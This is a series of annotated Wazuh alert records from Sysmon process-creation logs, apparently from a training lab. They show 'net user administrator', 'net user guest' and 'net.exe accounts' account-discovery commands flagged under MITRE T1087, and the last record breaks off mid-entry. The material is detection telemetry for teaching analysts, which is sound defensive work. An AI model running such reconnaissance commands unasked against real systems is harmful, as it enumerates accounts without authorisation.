data.win.eventdata.parentImage: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: net user guest No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: A net.exe account discovery command was initiated Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92039 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see high-risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 13 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534571.2301808 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:42:43.6117639Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 291075 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:42:43.603
ProcessGuid: {94294ddc-be63-680a-2c0c-000000000e00}
ProcessId: 8956
Image: C:\Windows\SysWOW64\net.exe
FileVersion: 10.0.26100.1882 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net.exe
CommandLine: net user administrator
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00}
ParentProcessId: 3244
ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe
ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe"
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:42:43.603 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be63-680a-2c0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8956 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1882 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: net user administrator No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 3244 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: A net.exe account discovery command was initiated Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92039 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105 or T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 14 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy, but can warn you of high‑value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534571.2307087 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:42:43.7162743Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 291105 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:42:43.711
ProcessGuid: {94294ddc-be63-680a-2e0c-000000000e00}
ProcessId: 9352
Image: C:\Windows\SysWOW64\net1.exe
FileVersion: 10.0.26100.1 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net1.exe
CommandLine: C:\WINDOWS\system32\net1 user administrator
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
ParentProcessGuid: {94294ddc-be63-680a-2c0c-000000000e00}
ParentProcessId: 8956
ParentImage: C:\Windows\SysWOW64\net.exe
ParentCommandLine: net user administrator
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:42:43.711 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be63-680a-2e0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9352 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: C:\\WINDOWS\\system32\\net1 user administrator No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-be63-680a-2c0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 8956 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: net user administrator No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: A net.exe account discovery command was initiated Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92039 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105 or T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 15 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy, but can warn you of high‑value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534572.2312224 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:42:43.9493907Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 291127 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:42:43.946
ProcessGuid: {94294ddc-be63-680a-2f0c-000000000e00}
ProcessId: 13660
Image: C:\Windows\SysWOW64\net.exe
FileVersion: 10.0.26100.1882 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net.exe
CommandLine: net user guest
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00}
ParentProcessId: 3244
ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe
ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe"
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:42:43.946 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be63-680a-2f0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13660 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1882 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: net user guest No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 3244 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: A net.exe account discovery command was initiated Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92039 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105 or T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 16 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy, but can warn you of high‑value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534572.2317475 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:42:44.0502982Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 291130 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:42:44.044
ProcessGuid: {94294ddc-be64-680a-310c-000000000e00}
ProcessId: 4256
Image: C:\Windows\SysWOW64\net1.exe
FileVersion: 10.0.26100.1 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net1.exe
CommandLine: C:\WINDOWS\system32\net1 user guest
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
ParentProcessGuid: {94294ddc-be63-680a-2f0c-000000000e00}
ParentProcessId: 13660
ParentImage: C:\Windows\SysWOW64\net.exe
ParentCommandLine: net user guest
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:42:44.044 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be64-680a-310c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 4256 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: C:\\WINDOWS\\system32\\net1 user guest No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-be63-680a-2f0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 13660 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: net user guest No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Discovery activity executed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92031 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105 or T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 25 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy, but can warn you of high‑value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534572.2322552 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:42:44.0939500Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 291133 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:42:44.091
ProcessGuid: {94294ddc-be64-680a-320c-000000000e00}
ProcessId: 10704
Image: C:\Windows\SysWOW64\net.exe
FileVersion: 10.0.26100.1882 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net.exe
CommandLine: net.exe accounts
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00}
ParentProcessId: 3244
ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe
